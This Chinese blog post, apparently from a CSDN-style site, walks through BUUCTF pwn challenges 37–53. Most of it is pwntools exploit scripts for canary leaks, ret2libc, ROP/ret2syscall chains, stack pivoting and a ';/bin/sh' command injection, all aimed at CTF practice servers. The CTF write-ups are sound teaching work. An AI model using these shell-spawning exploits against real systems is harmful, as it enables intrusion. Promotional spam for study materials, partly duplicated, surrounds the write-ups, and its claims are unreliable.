先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
在main函数里面发现gitf和vuln函数,先点进gift函数看看,发现
有print(format),格式化字符串漏洞啊.那么有什么用呢?别急接着往下看
看到vuln函数可以栈溢出,哎,但是这个v2 = __readfsqword(0x28u)是什么意思呢?不知道师傅们有没有了解过,这是栈的一种保护措施,这就是canary.简单介绍一下,就是在rbp下方的8个字节放置的一个随机数,然后在函数返回时检查这个随机数有没有被篡改,如果被篡改了,那么程序将立刻终止,那么现在知道这个格式化字符串有什么用了吧.我们只要好好利用这个漏洞就可以把canary泄露出来,然后再填上去,就可以成功栈溢出了,那么后面的不过是简单的ret2libc,但是有一点值得要说的是,这里泄露出来的canary是str也就是字符型的,不能立马就打包发送,我们要先用int(canary,16)来把它转化为16进制的整型才可.思路到这就结束了,如果师傅们打不通的话可以试试多动调
exp:
点击查看代码
from pwn import *
context.log_level="debug"
elf=ELF("buu37")
p=remote("node5.buuoj.cn",26874)
#p=process("./buu37")
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('libc-2.23.so_16_64')
puts_plt=elf.symbols["puts"]
puts_got=elf.got["puts"]
volun_addr=0x400887
rdi=0x0000000000400993
rsi_r15=0x00000000004006b1
ret=0x00000000004005f9
#gdb.attach(p)
#pause()
p.recvuntil(b"I'll give u some gift to help u!\n")
p.sendline(b'%7$p')
canary=p.recv(18)
go=int(canary, 16)
print((canary))
p.recvuntil(b"Pull up your sword and tell me u story!\n")
payload1=b'a'*0x18+p64(go)+b'a'*0x8+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(volun_addr)
p.sendline(payload1)
puts_addr=u64(p.recvuntil(b'\n')[:-1].ljust(8,b'\0'))
print(hex(puts_addr))
offset=puts_addr-libc.sym['puts']
sys_addr=offset+libc.sym['system']
bin_addr=offset+next(libc.search(b"/bin/sh"))
payload2=b'a'*0x18+p64(go)+b'a'*0x8+p64(rdi)+p64(bin_addr)+p64(ret)+p64(sys_addr)
p.recv()
p.send(payload2)
p.interactive()
buu三十八题(pwnable_orw)
这里
buu三十九题(bjdctf_2020_router)
这里一看题目我还以为输入一个1再输入/bin/sh,就可以getshell了,结果是我想错了。不知道为什么在发送/bin/sh的时候为什么还要在前面加一个’;'号
看学长是wp说是web版的命令执行,看不懂啊,也不知道咋解释,先上exp吧以后再说吧
点击查看代码
from pwn import *
context.log_level = 'debug'
context(os = 'linux', arch = 'i386')
#p = process('./buu39')
#gdb.attach(p)
p = remote("node5.buuoj.cn",26069)
p.sendline('1')
pause()
p.sendline(';/bin/sh')
p.interactive()
buu四十题(jarvisoj_level4)
ret2libc
点击查看代码
from pwn import *
#p=process("./buu40")
p=remote("node5.buuoj.cn",26676)
libc=ELF("libc-2.23.so_16_32")
e=ELF("./buu40")
write_glt=e.symbols["write"]
write_got=e.got["write"]
back=0x804844B
payload1=b'a'*(0x88+0x4)+p32(write_glt)+p32(back)+p32(1)+p32(write_got)+p32(4)
p.send(payload1)
write_addr=u32(p.recv(4))#这里我是把收到的数据进行u32解包得到的数据,你们的可能会不一样
libc_write=libc.symbols['write']
libc_system=libc.symbols['system']
libc_sh=next(libc.search(b'/bin/sh'))
re_sys=write_addr-libc_write+libc_system
re_sh=write_addr-libc_write+libc_sh
payload=b'a'*(0x88+0x4)+p32(re_sys)+b'aaaa'+p32(re_sh)
p.send(payload)
p.interactive()
buu四十一题(picoctf_2018_buffer overflow 1)
左边有个win函数点进去看看,
由代码易知,这个函数的功能是先搜索flag.txt文件,如果找到了则打印出来,如果没找到则退出程序,再看一下vuln函数里面有什么
有get函数又没有什么保护,那么给我狠狠的溢出啊
exp:
点击查看代码
from pwn import *
p=process("./buu41")
#p=remote("node5.buuoj.cn",29072)
elf=ELF("./buu41")
flag_addr=0x080485CB
payload=b'a'*(0x28+0x4)+p64(flag_addr)
p.send(payload)
p.interactive()
buu四十二题(inndy_rop)
静态编译的题目,而且又有gets函数,ret2syscall。这里可以使用ROPgadget --binary 二进制文件 --ropchain 来自动生成ret2syscall的exp,不过师傅们要注意缩进
点击查看代码
from pwn import *
from struct import pack
context.log_level = 'debug'
#context(os = 'linux', arch = 'amd64')
p = process('./buu42')
#p = remote('node5.buuoj.cn', 26148)
elf = ELF('buu42')
def get_payload():
p = b'a'*(0xc+0x4)
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080b8016) # pop eax ; ret
p += p32(0xb) # pop eax ; ret
p += pack('<I', 0x0806c943) # int 0x80
return p
p.sendline(get_payload())
p.interactive()
buu四十三题(jarvisoj_test_your_memory)
main函数里没啥漏洞,点进去mem_test看看,发现__isoc99_scanf(“%s”, s);函数,这个函数有一个特性就是当它使用 %s 格式说明符来读取输入到字符数组 s 中,直到遇到空白字符(空格、制表符、换行符等)才会停止读取。这意味着函数会读取一个以空白字符结束的字符串。那么栈溢出不就来了吗
再看左边win_func保存了一个system的函数,但是没有传入参数,既然如此那么我们就可以调用它,然后给他传入参数。
刚好程序里有cat flag字符串,那么直接拿来用。但是要注意,p32(system)后面要接p32(main函数的地址),不然打印flag没回显。不过你也可以自己调用read函数写入/bin/sh到一个地址,然后传参
exp:
点击查看代码
from pwn import *
context.log_level = 'debug'
#context(os = 'linux', arch = 'i386')
p = process('./buu43')
#p = remote("node5.buuoj.cn",29330)
elf = ELF('buu43_')
system_addr = elf.symbols['system']
flag_addr = 0x080487E0
system = 0x080485BD
flag = 0x080487E0
payload = b'a'*23 + p32(system) + p32(0x08048678) + p32(flag)
#payload = b'a'*23 + p32(system) + p32(0) + p32(flag)
p.sendline(payload)
p.interactive()
buu四十四题([ZJCTF 2019]EasyHeap)
buu四十五题([Black Watch 入群题]PWN)
点进vuln函数一看就知道是栈溢出+栈迁移漏洞,将0x200多个字节读入s也就是bss段中,然后再读取buf。但是buf溢出的部分十分有限,只能刚好覆盖的rbp和retaddr,所以考虑栈溢出。
这里有没有后门函数,也没可读可写可执行段,所以我们应该选择ret2libc,在s中写入一段gadget然后跳转到s所在的bss段执行该代码。不过各位是不是有疑惑,你刚刚不是才说了没有可读可写可执行段吗?这么现在又要执行bss里面的内容,bss又不是可执行段。没错bss确实不是可执行段但是,里面存放的gadget是可执行的,还记得rop链攻击的原理吗?通过控制返回地址来执行程序执行流的变化,也即是说我们并不是在执行我们写入在bss段的代码,因为真正的代码不是写作bss段的,应该位于text段。我们只是劫持了程序控制流,然后让程序把我们写在bss数据作为指针,然后去解析它,去执行它所指向的代码。而该代码又是存在于text段的自然可执行了。不过竟然有师傅能问出这种问题,还是说明了师傅是个合格的pwn人。OK那我们接着讲,我们可以在s的地址里写入ret2libc的代码,然后执行它,泄露libc的基地址后再跳转回来,再用one_gadget来getshell,之前已经写过一道栈迁移的题目了,所以在这里就不多加赘述了
exp:
点击查看代码
from pwn import *
#context.log_level="debug"
elf=ELF("buu45")
#p=process("./buu45")
p=remote("node5.buuoj.cn",25530)
libc=ELF('libc-2.23.so_16_32')
#gdb.attach(p)
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
write_plt=elf.symbols["write"]
write_got=elf.got["write"]
read_plt=elf.sym["read"]
buf=0x0804A300
vul_addr=0x080484FB
rdi=0x00000000004006b3
rsi_r15=0x00000000004006b1
leave=0x08048511
main=elf.sym["main"]
payload1=b'a'*0x4+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
p.recvline()
p.send(payload1)
p.recvuntil(b"What do you want to say?")
payload2=b'a'*0x18+p32(buf)+p32(leave)
#pause()
p.send(payload2)
write_addr=u32(p.recv(4))
offset=write_addr-libc.sym['write']
#sys_addr=offset+libc.sym['system']
one_gadget=offset+0x3a80e
#bin_addr=offset+next(libc.search(b"/bin/sh"))
p.send(b'a'*0x4+p32(one_gadget))
p.recv()
payload3=b'a'*0x18+p32(buf)+p32(leave)
p.send(payload3)
p.interactive()
buu四十六题(hitcontraining_uaf)
buu四十七题(picoctf_2018_buffer overflow 2)
有get函数,又有打印flag的函数(只是要满足一点点条件而已)。buu第一页也有类似的题。直接丢exp
点击查看代码
from pwn import *
#elf=ELF("./buu47")
p=remote("node5.buuoj.cn",28164)
#p=process("./buu47")
#gdb.attach(p)
ret=0x08048196
payload2=b'a'*(0x6C+0x4)+p32(0x080485CB)+p32(0)+p32(0xDEADBEEF) + p32(0xDEADC0DE)
p.sendline(payload2)
p.interactive()
print(p.recv())
buu四十八题(cmcc_simplerop)
又是一道静态编译的题目,相信那么现在应该能秒杀了,所以我就不详讲了,直接用ret2syscall。当然你要想尝试ropchain去写的话可能会发生一些不愉快的事情
点击查看代码
from pwn import *
p=process("./buu48")
edx_ecx_ebx=0x0806e850
eax=0x080bae06
int_80=0x080493e1
#gdb.attach(p)
p=remote("node5.buuoj.cn",29562)
elf=ELF("./buu48")
buf=0x80EAF90
payload = b'a'*0x20 + p32(elf.sym['read']) + p32(edx_ecx_ebx) + p32(0) + p32(buf) + p32(0x100)
payload += p32(eax) + p32(0xb) + p32(edx_ecx_ebx) + p32(0)*2 + p32(buf) + p32(int_80)
p.sendline(payload)
p.sendline(b'/bin/sh\x00')
p.recv()
p.interactive()
buu四十九题(wustctf2020_getshell_2)
刚好只能覆盖到retaddr,不过幸好有system函数和和sh\x00字符串,但是由于字数限制,我们只能覆盖0x8个字节。这样的话我们也用不了p32(system)+b’aaaa’+p32(sh_addr)。
这时候我们就需要用到call system指令了,那之前我们getshell时不也有call system指令吗为什么还要加b"aaaa",之前我们是跳转到elf.sym[“system”]。也就是说他会对寄存器进行一些操作之后再call system。我猜里面的push ebp的操作才是导致要在system和sh_addr之间要加四个字节的原因(当然也只是我的猜测,如有不对,欢迎师傅们指出来)。所以这里直接call system的话就可以直接加system的参数了
exp:
点击查看代码
from pwn import *
elf=ELF("./buu49")
#p=process("./buu49")
p=remote("node5.buuoj.cn",27335)
#gdb.attach(p)
#pause()
0x08048529
ret=0x08048196
sh_addr = next(elf.search(b'sh\x00'))
payload2=b'a'*(0x18+0x4)+p32(0x08048529)+p32(sh_addr)
p.sendline(payload2)
p.interactive()
print(p.recv())
buu五十题(mrctf2020_easyoverflow)
先跟着我来分析代码逻辑,其实这题也没啥考的,就看你代码能力行不行
首先把字符串"ju3t_@_f@k3_f1@g"放到v5里面。然后再用get函数读取v4,这题有canary,而且现在我们也不晓得该怎么泄露它,所以栈溢出还是有点困难。但是这个主函数里面有system(“/bin/sh”)了,想着怎么去调用。我们接着往下看,get后面会执行一个check函数,点进去看看他是干什么的
可以看到如果v3的长度等于i的话就可以返回1,然后在主函数中就可以getshell了,但是,问题在于v3的参数是不可控的,已经固定了的。别急我们看到这一行代码
if ( *(_BYTE *)(i + a1) != fake_flag[i] )
a1即为主函数里面的v5
a1的参数显然是可控的,这里给了一个指针指向a1的地址存放的内容,如果不等于fake_flag[i]里面的内容的话就会返回0,从而退出程序。反之如果我们传入fake_flag里面的内容作为a1
的内容的话,那么最后执行一次循环之后i++,所以最后一定可以让i最终等于v3然后返回1,从而getshell。那么我们不是控制不了v5的内容吗?因为我们get的函数是读入v4的。这种事情覆盖就行了
不用我再多说了上exp
点击查看代码
from pwn import *
p=process("./buu50")
#p=remote("node5.buuoj.cn",26562)
elf=ELF("./buu50")
payload=b'a'*0x30+b"n0t_r3@11y_f1@g"
p.sendline(payload)
p.interactive()
buu五十一题(bbys_tu_2016)
scanf函数导致的栈溢出我图都懒得放了,注意一下偏移就行。直接贴exp吧
点击查看代码
from pwn import *
from LibcSearcher import *
from struct import pack
context.log_level='debug'
context(os = 'linux', arch = 'i386')
p = process('./buu51')
#p = remote('node4.buuoj.cn', 27816)
elf = ELF('./buu51')
#libc = ELF('buu/libc-2.23.so')
#p.recv()
payload = b'a'*0x18 + p32(elf.sym['printFlag'])
p.sendline(payload)
print(p.recv())
buu五十二题(xdctf2015_pwn200)
常规的ret2libc
点击查看代码
from pwn import *
p=process("./bof")
#p=remote("node5.buuoj.cn",26666)
libc=ELF("/lib/i386-linux-gnu/libc.so.6")
#libc=ELF("libc-2.23.so_16_32")
e=ELF("./bof")
write_glt=e.symbols["write"]
write_got=e.got["write"]
back=0x80484D6
p.recvline()
payload1=b'a'*(0x6C+0x4)+p32(write_glt)+p32(back)+p32(1)+p32(write_got)+p32(4)
p.send(payload1)
write_addr=u32(p.recv(0x4))
libc_write=libc.symbols['write']
libc_system=libc.symbols['system']
libc_sh=next(libc.search(b'/bin/sh'))
re_sys=write_addr-libc_write+libc_system
re_sh=write_addr-libc_write+libc_sh
payload=b'a'*(0x6C+0x4)+p32(re_sys)+b'aaaa'+p32(re_sh)
p.send(payload)
p.interactive()
buu五十三题(ciscn_2019_s_4)
如何自学黑客&网络安全
黑客零基础入门学习路线&规划
初级黑客
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!
7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。
8、超级黑客
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的
视频配套资料&国内外网安书籍、文档&工具
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
一些笔者自己买的、其他平台白嫖不到的视频教程。
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
t/931ac5ac21a22d230645ccf767358997.webp?x-oss-process=image/format,png)
如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的
视频配套资料&国内外网安书籍、文档&工具
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
一些笔者自己买的、其他平台白嫖不到的视频教程。
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
548
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
